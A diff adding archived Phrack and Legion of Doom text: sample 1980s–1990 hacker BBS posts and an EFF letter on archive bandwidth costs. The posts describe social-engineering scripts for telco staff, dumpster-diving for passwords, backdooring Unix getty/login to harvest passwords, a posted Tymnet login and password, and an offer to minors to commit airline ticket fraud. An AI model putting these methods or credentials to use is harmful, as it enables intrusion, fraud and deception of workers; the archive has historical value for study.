+ call the "frame" #, and say "Hiya, 
+ this is Bob Lineman, could you run
+ into the MDF, and try to activate the
+ call forwarding on NNX-XXXX? send it
+ to NNX-XXXF, please, I need to check
+ it out from both ends..." then, hook
+ your computer up to the payphone that
+ NNX-XXXF is, and set up a simulator
+ for the login to that system. When you
+ have it in your pocket, call the frame
+ back and say "Hi, me again, would you
+ just disengage the forwarding on that
+ # for me? I've got the problem, but I
+ need it recieving calls to fix it.."
+ then you can re-hack it later if you
+ want by just calling the frame again
+ in a different shift..
+ 
+ later,
+  Paul Muad'Dib
+   Legion
+    of 
+     Doom
+ 
+1-90 Last=87 E=Mail Q=Quit T=Titles -
+ 
+ 
+ 
+Message #38: BOSTON COSMOS
+Msg left by: DOCTOR WHO
+Date posted: WED MAY 30 10:16:55 PM
+ 
+ 
+OK HERE IS A FRESH COSMOS DIALUP..SORRY
+NO PASSWORD...GO TRASHING BOSTONIANS!
+617-338-5xxx
+ 
+SPEAKING OF COSMOS, I WENT TRASHING TOD
+AY AND GOT A COSMOS PASSWORD. IT SEEMS
+TO BE A HIGH ACCESS ONE, THEY BROKE IN
+ON THE GUY USING IT TO DO MAINTENANCE.
+THE NAME IS FF01. NOW ALL I NEED IS THE
+DIALUP. I CAN'T SCAN WITH MY MODEM. IF
+ANYONE WANTS TO DO A LONG-DISTANCE SCAN
+OF 413, I WILL GIVE YOU THE EXCHANGES T
+O HACK, AND THE PASSWORD. PLEZE! 
+OH, IF THERE ARE ANY PHREAKS IN THE 413
+NPA READING THIS, PLEASE REPLY..ITS 
+LONELY OUT HERE! CONFERENCES: TOO BAD
+IF A COMPANY GOES OUT OF BUSINESS BECAU
+SE OF PHREAKS...ONE LONG-DISTANCE COM
+PANY WHO IS BUGGING ME SAYS THAT PHREAK
+ING IS FORCING THEM OUT OF THE BUSINESS
+THAT IS BULLSHIT. DON'T BELIEVE IT.
+THE PHONE CO.'S MAKE SO MUCH PROFIT ITS
+PITIFUL. IF IT WASN'T FOR PHREAKS 
+WE WOULD STILL BE STUCK WITH SXS. SO WE
+HAVE CREATED MANY JOBS..IN AT+T, GTE, I
+TT...AND IN THE FBI. SO FEEL GOOD..YOU'
+VE HELPED THE ECONOMY! I HEARD THAT MCI
+TAKES A BIG TAX LOSS ON STOLEN SERVICES
+. MUCHO BUCKS SAVED! THATS ALSO (PROBAB
+LY) THE REASON THE METROPHONE DOESN'T TR
+Y HARD TO CATCH PHREAKS. 
+  YOU KNOW IF THERES ONE THING I CAN'T 
+STAND ITS POLITICS AMONG PHREAKS..ONE
+PERSON TRYING TO MAKE OTHERS L1 %'AD
+AND SAY" I RULE!" YOU KNOW WHAT I MEAN?
+YOU PEOPLE WHO I'ME TALKING ABOUT: NOW
+THAT YOU'RE HERE UNDER DIFFERENT NAMES,
+TRY TO BEHAVE!..'NUFF SAID
+THE T.H.A. (TIMELORDS HOLY ALLIANCE) IS 
+THE GROUP THAT REALLY RULES..BECAUSE WE
+DON'T HAVE ANY RULES...NO INITIATION..
+NO NOTHING...AND YOU NEVER HEAR ANYBODY
+BADMOUTHING US, DO YOU?
+IS THERE A GOOD WAY TO BULLSHIT THE 
+FONE CO. FOR THE COSMOS DIALUP?
+BYE....
+ 
+-----------=?> DOCTOR WHO <?=----------
+ 
+ 
+ 
+<1-48 LAST=38 E=mail Q=Quit T=Titles>
+ 
+---------------------------------
+MESSAGE #81: HACK-A-TRIP
+---------------------------------
+Msg left by: BROADWAY HACKER
+Date posted: TUE JUL 24  8:24:02 PM
+ 
+As you have probably seen on some other
+ good boards, I am ex-
+tending an offer to anyone who wants to
+ come to New York for 
+free. Hacking airline tickets isn't as 
+hard as you think. If 
+your interested, maybe to go to a TAP m
+eeting or something, 
+leave me EMAIL. It is relatively easy, 
+but one screwup can ruin
+you. There are others who may have some
+ idea how this is done, 
+but have not actually done it. Leave me
+ EMAIL if your interest-
+ed. You must be a minor, however, and y
+ou must leave me a VALID
+phone number in feedback since there ar
+e security measures in-
+volved since it is grand fraud.
+ 
+*** Broadway Hacker ***
+(-+-)(Chaos)(+-+)
+ 
+Hack-a-trip
+ 
+ 
+---------------------------------
+MESSAGE #63: ARGGGH!
+---------------------------------
+Msg left by: KARL MARX
+Date posted: SAT JUL 21  4:14:43 PM
+ 
+Ahem, I don't know if I am getting moral
+or something, but things are getting
+pretty, well, strange.
+ 
+First off: unix is pretty easy to crash
+if you want to--but why would you want
+to?  Obviously, very few people know
+"everything" about Unix, and I would
+like one reason that destroying a system
+would be better than learning to use it's
+"special" features.  If you want to get
+your face on Newsweek, go ahead, but
+otherwise, don't start destroying stuff
+just for the sake of vandalism!  Instead
+of being a vandal, do somthing Robin
+Hood-ish, like nice the parent process
+of the batch runner to -20 or somthing.
+ Or give everyone full privilige
+to / or make them all user 1.
+ 
+Otherwise, as for metro tracing, that's
+kinda hard to swallow.  Would whoever's
+friend's sister care to elaborate on that
+one?
+ 
+I don't know if anyone cares, but I had
+a chance to take a look at those
+"goldphones" and Geez!!!  There were
+codes written all over it!  I don't 
+understand some people very well.  That
+is simply stupidity. 
+There is really nothing "new and exciting"
+in phreaking anymore...  most of what you
+hear is bullshit from some twelve-year-
+old that just learned how to use metro last
+week.  There is simply no "new" anything!
+Eventually there will be, but until then
+these "phreak" boards will simply be
+"how to phreak"--tutorials instead of
+journals.  Drat!
+:::::::::::::::::::::Karl Marx
+                     LOD
+---------------------------------
+ 
+You have been on over your time limit.
+Use the 'O' option to log off.
+ 
+____
+ 
+ 
+Logout Job ??, TTY ??,
+   On   21-7-84 For 34 Minutes
+ 
+ 
+_____________________________________________________________________________
+ 
+   *** {Samples from the Phoenix Project BBS (512), Sysop: The Mentor} ***
+   *** {As many are aware, the Phoenix Project was one of the intended} *** 
+    *** {targets in the Hacker Crackdown of 1990 and was erroneously} ***
+         *** {affiliated to Steve Jackson Games' Illuminati BBS} ***
+ 
+ 
+                       *** {Other Networks Sub-Board} ***
+ 
+8/60: Autonet...
+Name: Erik Bloodaxe #2
+Date: Thu Jan 11 13:18:39 1990
+ 
+It wouldn't be such a great idea to scan Autonet through the Telenet
+gateway.  Autonet raised a holy shit-fit when Urvile was doing it
+about a year ago, and sent Telenet Security all kinds of nasty
+mail bitching for them to stop whoever in 404 was connecting to their
+system.  Telenet blew them off, but if it started again, Telenet might
+just have to listen to their whining and crack down.  
+I suggest you (or whoever is planning on this) do your scanning through a
+main dialup.  It will be slower, but probably safer in the long run.
+->ME
+ 
+ 
+ 
+46/60: pac*it
+Name: Corrupt #114
+Date: Thu Feb 01 06:59:10 1990
+ 
+pac*it plus calls 03110..germany and spain..I didn't think it called DPAC. 
+usefulfor scanning spain..but at this point......hmm I'd be scared of what
+MCI i would do then GM...
+anyone up on Kinneynet?hehehehehe
+I'll post the dialup later but u need a NUI for it :-((
+Develnet? I thought the Develnet was just x.25 server software! I've seen 
+several Develnet pads and I  had gotinto thesystems it connected to and they 
+weren't MEAN related...maybe I'm wrong?(it was a modm company.)
+Needless to say I was pissed when everyone used it todeath just to see a 
+pretty (canada)..the reason it diconnects is because of where you're calling 
+from..if you call from canda u probably won'T expirence this problem....on the
+ 
+03110 develnet..same thing cept  you have to be at console...there are still 
+somesystems availble from there that r open..here'Sone IBM <-i couldn't hack 
+it so of course I posted that one:-))
+C U-->greets from [8lgm]corrupt
+ 
+ 
+ 
+                         *** {The HP-3000 Sub-Board} ***
+ 
+36/41: Woah!
+Name: Erik Bloodaxe #2
+Date: Mon Jan 22 03:36:40 1990
+ 
+I wasn't ragging on MPE!  Not at all, i was just "JOking" about the large 
+numbers of hp-3000 systems around the world and the unbelievable ease in 
+gaining access on one.
+Geez, read...MPE seems ok, just kinda hard to get used to.
+I mean, I'm in HUNDREDS of hp's, but until last year I didn't know what to do 
+with them...so they just sat there.
+UNIX is just as lame security-wise, but On a percentage basis, I have gotten 
+into 85-90% of the HP's I have found, while I've only gotten into abot 50% of 
+the UNIXes I've found.
+(Look at me grovel before one of the two HP experts I've ever seen...pathetic,
+isn't it?)
+Wiz, no offense intended towards your adopted O.S.
+->ME
+ 
+ 
+                        *** {UNIX Sub-Board} ***
+ 
+60/69: both ways
+Name: Corrupt #114
+Date: Mon Feb 05 05:08:25 1990
+ 
+nice trojans
+------------
+good security
+ 
+this works both ways....look-out for unixes(and VMS sites) that keep another 
+copy of /etc/passwd (or sysuaf.dat) and everynite rewrite it over the one
+used for login(some any mods are discovered)..u can alternatly install some 
+security inside likethis for yourself...(hide it in CROn) (or wherever u want 
+on vms:-)) undersytand? I know I'm not clear:-((
+but thats works for you sometimes and it'S simple if you know script:-)
+anyone here into Rapid Fire hacking?
+ 
+ 
+                    *** {Electronic Banking Sub-Board} ***
+ 
+12/32: Treason & Government Smegma...
+Name: Erik Bloodaxe #2
+Date: Fri Jan 19 02:06:13 1990
+ 
+It's the Major SS buzzword these days.
+Treason.  If someone is poking around in ANY system they feel is 
+sensitive (although they leave sysdiag unpassworded, or lp password lp, etc..)
+they will then label you as:
+"A Serious Threat to National Security!"  
+Give me a break.  Hell, I think my association with Par & Phoenix alone
+is enough to get me the firing squad.  I haven't even done anything, 
+but it seems that everything bad that's happened I keep getting
+brought up, as I know such and such, or I somehow know EVERYTHING about
+how such and such happened.  
+Well, I've tried my best to be good, and stay out of government things, 
+military things, etc...  I've even edited out the "sensitive" things I've
+run across in the Telenet scanning just for their sense of well being, 
+but if I begin to feel threatened, it's all going out.   Unabridged.
+We will see...I'm already getting nervous...the feds are already pissed 
+that LOD is still kicking, and this bbs must have SLAMMED it into their
+faces.  And I know that the EFT files must have pissed them off as
+well, although that may or may not have anything to do with
+this bbs suddenly going back up.  
+Well, I'm not a threat to ANYTHING, except myself maybe.  Anyone who
+knows me knows that.  Back me up people.  This is my public announcement
+of not-guilty to any and all crimes against the Security of the United
+States.  So what if I was scanning 2502 a while back?  Anyone ever think
+that it would be in THE INTEREST OF NATIONAL SECURITY to hop into a
+Soviet system?  I thought it would.  
+Par knows what I mean.  Hell, The government now seems to think he's a spy, 
+and wants to shoot him.  Killing Teenagers for fun is not my idea of 
+constructive problem solving guys.  Take an extended course in the 
+ways of the hacker.  That education might do you all a world of good.
+You may even pick up something you missed in your little weekend getaway
+training seminar in fighting computer crime.  When you come and kick in my
+door, (don't step on the cat), and if you don't blow me away first, 
+maybe I can educate you all a little better on what is REALLY GOING ON!
+(This message posted for the Secret Service & CERT, et al. whomever is
+ posing on here, or reading this via Mentor's & My own Data Taps)
+->ME
+ 
+ 
+ 
+                     *** {Phone Co. Computers Sub-Board} ***
+ 
+3/46: LMOS
+Name: Acid Phreak #8
+Date: Tue Jan 09 17:56:23 1990
+The most recent LMOS interlude was one in my local area.  Got the host 
+processor (an IBM 3270) off Predictor.  Overall, a very handy tool to add to
+your telco 'collectables'.  The FE's of course were PDP 11/70s using MLT for 
+reference.
+Aw thit.. lookit all dem Hicaps.
+--ap
+  (advanced phreaking)
+ 
+ 
+6/46: ICRIS
+Name: Phiber Optik #6
+Date: Wed Jan 10 16:37:27 1990
+ 
+Not to nitpick, but an LMOS CP is an IBM S370 (3270 is an SNA, used to get to 
+BANCS through LOMS for instance).
+CRIS, as mentioned, the Customer Record Information System is a dandy little 
+IBM system whose main purpose is to house customer records. There are a small 
+handful of "CRIS" systems, like LCRIS (Local), and ICRIS (Integrated, which 
+should be noted is used by the Residential Service Center). Here in NYNEX, the 
+only way to reach these systems  (we obviously aren't hardwired hackers) is 
+through BANCS, a bisync network. BANCS is not direct dialable, but IS 
+available through a 3270 link on the LOMS system, used by LDMC (LAC or FACS, 
+depending where you live). And LOMS IS accessible. A host of systems are also 
+available through FACS (which can be reached through LOMS on BANCS) such as 
+CIMAP, LMOS, SOP, TIRKS, the COSMOS-PREMISE interface, etc. So as you can see, 
+rather than going after any specific system, going after the RIGHT system will 
+pay off greatly (LOMS in this example). Oh, waitta-minnit, those mentioned 
+systems are off of BANCS, sorry. You can reach FACS on BANCS, and access a 
+couple 'o things like some of those mentioned, COSMOS (certain wire centers 
+only), etc. OK, enough rambling. Let's hear someone else's input.
+Phiber Optik
+Legion Of Doom!
+$LOD$
+ 
+____________________________________________________________________________
+ 
+ 
+ 
+           *** {The Twilight Zone BBS (203), Sysop: The Marauder} ***
+         *** {NOTE: All messages from 1985 unless stated otherwise} ***
+ 
+ 
+[MSG #12 OF 22]: INWATS & X-LATIONS
+ 
+FROM: THE MARAUDER
+DATE: MAY 08     {1985}
+ 
+Under CCIS, INWATS (800's) are handled completely different from the older
+method (the old method i don't completely uderstand, but it translated
+somehow based on it's own prefix & suffix). under ccis on the other hand,
+inwats #'s are handled in the following manner: when the 800 number reaches
+your toll office, a query is made to the 'INWATS DATABASE', (the master
+database being at the KC RNOCS I believe), i believe each RNOC (regional
+network operations center, of wich there are 12, one for each region), has
+their own database (which is updated on a regular basis). a query is made
+(via a CCIS link) to the inwat's database, and a POTS (plain old telephone
+service, just a plain 10 digit ddd telephone number, ie: npa+pre+suffix), and
+the POTS number is pulsed out from the toll center and your call is completed
+just like a normal ddd (direct distance dialing) call, talthough it was noted
+that the call was an 800 at the origination (your) toll office, so and you
+are not charged foor the call.. with this in mind, it's a simple matter for
+the inwat's database that handles your reigon to return a translation that
+differs from another reigons translation, for example say fred phreak in
+new jersey places a call to LDX extender service at 800-XXX-3333, upon
+reaching his toll center, the toll center quereys the inwat's database that
+handles new jersey, and a POTS translation is returned which for obvious
+reasons would be the closest port to him, so let's say the translation was
+(201)-XXX-4455, the toll office upon recieving this would proceed to complete
+the call, and fred phreak would be connected to LDX at (201)-XXX-4455..
+ 
+continued next..
+ 
+ 
+ 
+ <1-22, ^12> [?/HELP]: 
+ 
+[MSG #13 OF 22]: ABOVE CONT'D
+ 
+FROM: THE MARAUDER
+DATE: MAY 08
+ 
+now, on the other hand let's say bill phreak in california calls the LDX 
+extender service at (800)-XXX-3333 (same number fred called from NJ), his 
+regions inwat's database may return a completely different POTS x-lation say 
+(213)-XXX-1119, again being ldx's closest port to bill phreaks toll center..
+ 
+utilizing ccis, and inwat's databases, other clever things are possible for 
+example, as you all know ALLIANCE teleconfrencing is unavailable on 
+weekends, here's how that works: when you dial 0-700-XXX-1000, that number 
+is intercepted at TSPS and translated into a corresponding WAT'S number, for
+this example, we'll say it translates to (800)-XXX-1003 (white plains), and 
+forwarded from tsps to a toll center, the toll center upon recieving the 
+800-XXX-1003, queries it's inwat's database and a POTS translation is 
+returned say 914-XXX-6677, which is the DN (Directory Number) for the 
+bridge-center. now on a weekend, the inwat's database, instead of returning 
+914-XXX-6677 may return 914-XXX-0077, which would terminate at a recording 
+saying alliance is not reachable on weekends.., that's why everyone is 
+alway's interested in the 'ALLIANCE TRANSLATIONS'. Because if you have the 
+x-lation you can simply use a blue box to route yourself directly to the 
+bridgecenter and bypass the whole tanslation procedure..
+ 
+any questions, please post..
+ 
+The
+  Marauder
+Legion of Doom!
+ 
+ 
+ 
+ ____________________________________________________________________________   
+ 
+            *** {Black Ice Private (703) BBS Message Base Sample} ***
+       *** {Black Ice had a VERY restrictive user base as shown in the} ***
+      *** {included userlist. The quality of the messages was excellent} ***
+ 
+ 
+%> Sub-board: Advanced Telecommunications
+%> SubOp:     ANI Failure
+%> Messages:  100
+%> Files:     0
+ 
+ 
+%> Message:  32 of 100
+%> Title:    800 xlations
+%> When:     12/16/88 at 2:45 am
+%> Left by:  ANI Failure [SubOp] [Level: 8]
+ 
+You can get them from a 4ess or some work centers like RNOC and RWC (good luck,
+have a dialback).. Or from ONAC in Kansas City (816). The Operations Network
+Adminstration Center is the focal point for 800 services in the AT&T network.
+ONAC works in conjuction with the AT&T WATS centers (I think there are 3?) and
+800 service co-ordinators to do operations, adminstration, and maintenance on
+the 800 number network. You can reach the WATS centers phree of charge with a
+959 plant test number in the correct NPAs (I know 914 has one). I think it was
+959-5000 but that might be wrong.
+ 
+The tech. term for an 800 xlation is a plant test number. This does not have to
+be pots, but can be other system codes like 122, 195, 196, 123, etc. The only
+type of 800 number that terminates in POTS is a READYLINE 800 number (AT&T). I
+don't know about sprint, mci, etc. though. A good topic for investigation
+though, thankx for the idea!
+ 
+If you have access to a 4e (does anyone on her have this? If so I'll trade
+anything I have for a 4e), you can type this in to translate a number:
+ 
+well....i can't find the right notebook. it is somethink like:
+ 
+TEST:DSIG;INWATS 800 nxx xxxx!
+ 
+This does a Direct Signaling (DSIG) message into the 4E which commands the 4E
+to pull the 800 internal number from the network control point (NCP) over CCIS
+links. The 4E you are on must be included in the service area of that 800
+number though, i.e. someone in the area served by that 4E would have to be able
+to dial it in order for the 4E to have the xlation. So if the 4E is not in the
+right area it will say 'NON SUBSCRIBED' or something of that nature. Oh, I just
+remembered, there is an AT&T work group named DSAC (Direct Signaling Admin.
+Center) that performs direct signaling messages into switches and things. If
+you want the DSAC #, I can provide it..I don't think too many phreaks have
+their number so they might be worth engineering.
+ 
+Oh - the 800 xlation input message into the 4E was social engineered a long
+time ago by The Marauder and Phucked Agent 04 from an RWC. But, thanks to a
+fuck up by The Executioner and friends, the RWCs became very tight lipped...it
+only takes 1 fuckup...
+ 
+Um, I have gotten translations from the customer before, posing as AT&T and
+giving them bs about 'MLT has found a potential trouble in your circuit' (haha)
+and we need your translation number. I only did this once since I have never
+had any major need to pull 800 xlations. But that will work in some cases if a
+human answers. Or if you can get the terminating company name/location, you can
+keep engineering and narrow down the locations of the xlation (say within their
+centrex group or something) and then (ughh..dangerous and slow) scan for the
+number, or do more engineering for it, etc...
+ 
+There is an easier way to get 800 translations but I swore not to tell anyone
+(that was the conditions of me getting the info) from a certain AT&T dept and a
+certain support system...if you want a translation in an AT&T area I will try
+to get it for you though....so leave mail or post and maybe I can help..
+ 
+ANI-F
+ 
+legion of 800 numberz
+ 
+ 
+____________________________________________________________________________
+ 
+ 
+                        *** {UNIX Sub-Board} ***
+ 
+ 
+%> Sub-board: UNIX
+%> SubOp:     The Prophet
+%> Messages:  99
+%> Files:     1
+ 
+ 
+%> Message:  5 of 99
+%> Title:    getty, login
+%> When:     12/16/88 at 6:19 pm
+%> Left by:  The Urvile [Level: 8]
+ 
+for getty, just check and see if the first entry is <something>, where that is
+your back door, of sorts.  the init program will have to be a bit (?) larger
+than the original, considering that you'll have to put in the stuff to make it
+set up your environment & exec /bin/sh.
+login, on the other hand, can put a backdoor in the gpass() routine, which can
+conveniently write the passwds to a file.  not too useful to have lots of
+passwds in an already backdoored system, you say?  bull.  there are lots of
+southern bell systems i've gotten into by using the same passwds as the hacked
+system.  also, what if they remove the backdoor?  too bad, it'll take you an
+hour or so to put the source up & modify it again.
+one thing that i've been thinking about: on a system, backdoor getty, login,
+(for the reasons cited above), and something like 'date', to check 1) if root
+is using the program, and 2) to see if your handy dandy login has been erased,
+and put it back if 3) a day or so has elapsed from the last call of the 'date'.
+well, i thought it was a good idea.  much better than using cron & whatever to
+put a username in the passwd file.
+encryption on cosmos:
+it's strange, to be sure.  i tried putting a 404 cosmos passwd on your 602
+cosmos. The user id's were different, the versions of cosmos were different, i
+think, but the username was the same.  has anyone ever seen ANY (no matter how
+old) cosmos login source?
+incidentally, is anyone doing anything on sbdn of late?
+scanning for addresses is generally a bad idea.
+ 
+ 
+               *** {SPCS/OSS Information Sub-Board} ***
+   *** {Stored Program Control Systems / Operations Support Systems} ***
+ 
+%> Sub-board: SPCS/OSS Information
+%> SubOp:     ANI Failure
+%> Messages:  97
+%> Files:     1
+ 
+ 
+ 
+%> Message:  19 of 97
+%> Title:    DMS
+%> When:     12/28/88 at 10:20 am
+%> Left by:  Epsilon [Level: 8]
+ 
+I found out some things about DMS if anyone's interested.  I only spent a
+little while looking around, but I managed to figure out that the DMS does
+indeed have a sort of tree structure.  I haven't figured out the structure of
+TABLES yet, but I kind of know how the rest works.  Watch..
+ 
+ Ok, from the > you can enter tasks, (I prefer to call them toolboxes because
+they're like little tools you can run to perform different things.)  For
+instance, you have one called LOGUTIL which is some sort of utility that keeps
+tabs on various things, and you can view the logs kept.  After you have entered
+LOGUTIL, you can type LIST LOGUTIL and it'll spool out commands.  You can also
+type LIST LOGS to see a list of logs that are kept.
+ 
+ The next thing I was fooling with was SERVORD, which is obviously some type of
+Service Order processing software.  This toolbox is much friendlier, as it does
+include the help command, and it provides help on the syntax of each command.
+Unfortunately, it does not give each parameter for each command.  I'm sure that
+would take up quite a lot of space.  I think you're going to need a manual to
+really do anything cool with SERVORD, but hey..
+ 
+ Sorry if you people knew all of this already.  I guess I'll keep posting about
+it as I learn more.
+ 
+ Sheesh.  Lame post.
+ 
+ Epsilon
+ 
+____________________________________________________________________________
+ 
+                   *** {Userlist as of Mid-May it seems} ***
+ 
+%> Black Ice Private User List <%
+ 
+Name                             Level      Status       Posts     Last on
+===============------------------=====------======-------=====-----=======--
+System Operator                    11       Sysop         33       5/16/89
+The Mentor                         11       Sysop         59       5/16/89
+Epsilon                            8        Charter       106      5/8/89
+The Prophet                        8        Charter       59       5/15/89
+ANI Failure                        8        Charter       220      5/6/89
+The Urvile                         8        Charter       71       5/4/89
+Doc Cypher                         8        Charter       56       5/13/89
+Lex Luthor                         8        Charter       21       5/10/89
+The Leftist                        8        Charter       20       5/14/89
+Erik Bloodaxe                      8        Charter       75       5/17/89
+Empty Promise                      8        Charter       16       5/5/89
+Generic 1BED5                      8        Charter       46       5/16/89
+Skinny Puppy                       8        Charter       93       4/23/89
+Jester Sluggo                      8        Charter       32       5/13/89
+Red Eye                            8        Charter       31       5/2/89
+The Marauder                       8        Charter       9        5/12/89
+Ferrod Sensor                      8        Charter       10       3/30/89
+____________________________________________________________________________
+ 
+           *** {Tymnet (Packet Switching Network) Sub-Board} ***
+ 
+%> Sub-board: Tymnet
+%> SubOp:     Lex Luthor
+%> Messages:  48
+%> Files:     0
+ 
+ 
+%> Message:  36 of 48
+%> Title:    isis and elf
+%> When:     3/25/89 at 12:37 am
+%> Left by:  Lex Luthor [Level: 8]
+ 
+I believe ANI was correct about the acronym for ISIS.
+Internally Switched Interface System
+I think it is the go between from the engine to the node code.  Kind of like
+how assembly is the go between my apple and basic.
+ 
+ELF - Engine Load Facility. This is a program that transfers and loads code
+into a TYMNET Engine node.
+ 
+ISIS has slots, in each slot a program (node code) can run. This node code
+is different for different tasks.
+ 
+I should clarify the above, only one 'application' ie: gateway, tymcom,
+whatever, can run on isis, and usually is found on slot 0. But other programs
+can be run on other slots. Programs that allow you to log into the slot and do
+things. like DDT - Dynamic Debugging Tool.
+ 
+ 
+All this and more will be explained in my upcoming (hopefully) file on Tymnet
+called-- Anatomy of a Packet Switching Network: MDC's TYMNET.
+ 
+ 
+inter-link cleared from VALTDNET (C) H9 N4067 to TYMNET (C) H5981 N7347
+inter-link cleared from H1 N2010 TESTNET to H1 N2200 BUBBNET
+inter-link cleared from TYMNET (F) H5277 N6420 to BUBBNET (F) H15 N2324
+inter-link cleared from AKNET to TYMNET
+inter-link cleared from TYMNET to AKNET
+inter-link cleared from TRWNET to PUBLIC TYMNET
+inter-link cleared from PUBLIC TYMNET to TRWNET
+ 
+please log in: DECLOD
+Password: DECLODH
+ 
+Interlink established from TYMNET to TSN-NET
+ 
+Please log in: Gomer T. Geekster
+ 
+--Lex
+ 
+ 
+%> Message:  44 of 48
+%> Title:    ontyme II
+%> When:     4/4/89 at 1:15 am
+%> Left by:  Lex Luthor [Level: 8]
+ 
+The system used for setting up the DECLOD acct was TYMVALIDATE which isn't
+exactly the same as NETVAL but close.
+ 
+Be careful with ONTYME II, since it automatically updates ALL files you read.
+So if you read some files in that persons' personal directory, they can see
+that either someone has their acct/pass or someone is using IMITATE and reading
+their stuff. Me and Skinny Puppy are working on a way to defeat this....
+ 
+Lex
+ 
+ 
+ 
+%> Message:  47 of 48
+%> Title:    INTL TYMNET
+%> When:     4/21/89 at 1:17 pm
+%> Left by:  Skinny Puppy [Level: 8]
+ 
+International Tymnet - how many of you have seen tymnet claiming that it serves
+over 65 countries, but don't really belive it? well, they do, sort of.
+There is a tymnet-europe called Mcdonnell Douglas Information Systems (MDIS).
+While I don't have any dialups for it, I have X.121 addresses in France and
+BeNeLuxKG. once you get there, you can type HELP and glean alot of what is
+going on. The interesting thing is that a lot of things that say ACCESS NOT
+PERMITTED from regular tymnet are actually european addresses and can be used
+on MDIS. for instance, ROMA (Italian for ROME), ESAIRS, and EURONET (which is a
+host selector for american public timesharing systems). While there doesn't
+seem to be a lot of european hosts, I am sure that if everyone on here pulled
+up all their old tymnet-hack sheets where they had things listed as ANP (My
+abbreviated for ACCESS NOT PERMITTED) and tried a few we could find something
+new. Right now, I will only give out my French MDIS gateway - It is
+208092020029. Figure out how to get there yourself. If you DO find anything
+interesting, leave me mail, and we can trade. I already have some internal MDIS
+systems there, if I can just figure out how to use them.
+ 
+Coming Soon to a Board not so near to you: NISNET (tymnet-japan) and the
+Carribean tymnets. Until then, ASSIMILATE
+ 
+Skinny Puppy  21 april 1989
+ 
+ 
+_____________________________________________________________________________
+ 
+%> Sub-board: Vocal Hacking
+%> SubOp:     ANI Failure
+%> Messages:  45
+%> Files:     0
+ 
+ 
+%> Message:  3 of 45
+%> Title:    Operator engineering
+%> When:     12/6/88 at 12:43 am
+%> Left by:  Ferrod Sensor [Level: 8]
+ 
+To answer ANIF's question, I have been doing some TSPS/TOPS engineering lately
+for a variety of purposes, one of which is a bit far fetched but has
+possibilities. I am trying to  find a way to possibly freeze an operator
+console (the method I am trying is actually simpler than it sounds). It
+involves getting the op to connect to a short circuite test code, either by ACS
+(key) or by OGT (outgoing trunk) outpulsing sequence. There area a few flaws in
+this though, the main one being the more than likely possibility of the Op
+simply releasing the console position (even though the short circuit, when
+dialed, cannot be hang up on, the  caller must wait for it to time out (about
+three minutes or so).If this was the  case, then the result could be the
+Operator having an inaccessible outgoing line for a short period of time, which
+wouldn't affect much with the actuall console..The things I tried recently with
+this didn't result in much, but if I take into account TOPS/TSPS RTA (Remote
+Trunking Arrangements) setups (where a caller from one area code, with a 0+ or
+0- call, may be connected to an operator in a site in a different NPA. Test
+codes are different, even in exchanges, so an operator site in a diffeerent NPA
+wouldn't be affected the same with a different code.
+ 
+The overall purpose to this would be to create a certain condition with the
+operator network that could be used to gain information when investigated, say
+by someone from Mtce. engineering or theTOPS/TSPS SCC or equivalents. There are
+other ways to start an engineer of course, but this is just something that's
+concrete (meaning you could get people to fish around for info a bit easier
+than coming in for a random request.
+ 
+This is getting a bit long. I'lll post more later about Operator engineering,
+something more immediately practical next time. The board looks promising.
+ 
+                        Ferrod/LOD
+ 
+ ______________________________________________________________________________
+ 
+ 
+    LOD Communications: Leaders in Engineering, Social and Otherwise ;)
+ 
+    Email:      lodcom@mindvox.phantom.com
+    Voice Mail: 512-448-5098
+    Snail Mail: LOD Communications
+                603 W. 13th
+                Suite 1A-278
+                Austin, Texas USA 78701
+ 
+ ______________________________________________________________________________
+                       End Sample H/P BBS Messages File
+ 
+
+LOD Communications: Leaders in Engineering, Social and Otherwise ;)
+ 
+Email: lodcom@mindvox.phantom.com
+Voice Mail: 512-448-5098
+Snail Mail: LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA 78701
+ 
+
diff --git a/phrack43/2.txt b/phrack43/2.txt
new file mode 100644
index 0000000..1de539c
--- /dev/null
+++ b/phrack43/2.txt
@@ -0,0 +1,954 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 2 of 27
+
+                                Phrack Loopback
+                                    Part I
+
+****************************************************************************
+
+                               COMING NEXT ISSUE
+
+                         Van Eck Info (Theory & Practice)
+   More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
+      HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)
+                          Neato Plans For Evil Devices
+                               Gail Thackeray Gifs
+
+*********************************** M A I L *********************************
+
+Chris,
+
+Craig Neidorf gave me these addresses as ways to reach you.  He tells me
+that you are currently editing Phrack.  I hope you are well.
+
+Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
+eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
+IUP connection, was charging us an extra $1,000 per month.  They did some
+investigation at my request.  We determined that Phrack traffic alone was
+responsible for over 40% of the total bytes transferred from the site over
+the past year or so.  This is several gigabytes per month.  All in all, the
+CuD archive, which contains Phrack, CuD, and other publications accounts
+for 85% of our total traffic.  All of the email to and from EFF, Usenet
+traffic, and other FTP (from the EFF archive, the CAF archive, and others)
+constitutes about 15%.
+
+EFF isn't going to be able to carry it any more because it is effectively
+costing us $1,000 per month.  The fundamental problem is that Phrack is so
+popular (at least as a free good) to cause real expense in transmission
+costs.  Ultimately the users are going to have to pay the costs because
+bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per
+year it costs us to carry Phrack is not something which EFF can justify in
+its budget.  I'm sure you can understand this.
+
+On July 1, eff.org moves from Cambridge to Washington, DC which is when I
+expect we will stop carrying it.  I wanted to raise this issue now to let
+you know in advance of this happening.
+
+I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
+maintains the archive, to see whether there is anything we can do to help
+find another site for Phrack or make any other arrangement which will
+result in less loss of service.
+
+Mitch
+
+
+
+------------------------------------------------------------------------------
+                Mitchell Kapor, Electronic Frontier Foundation
+     Note permanent new email address for all correspondence as of 6/1/93
+                              mkapor@kei.com
+
+
+[Editor:  Well, all things must come to an end.  Looks like EFF's
+          move to Washington is leaving behind lots of bad
+          memories, and looking forward to a happy life in the hotbed
+          of American politics.  We wish them good luck.  We also
+          encourage everyone to join.........CPSR.
+
+          In all fairness, I did ask Mitch more detail about the
+          specifics of the cost, and he explained that EFF was paying
+          flat rate for a fractional T-1, and whenever they went over
+          their allotted bandwidth, they were billed above and beyond
+          the flat rate.  Oh well.  Thank GOD for Len Rose.
+          Phrack now has a new home at ftp.netsys.com.]
+
+****************************************************************************
+
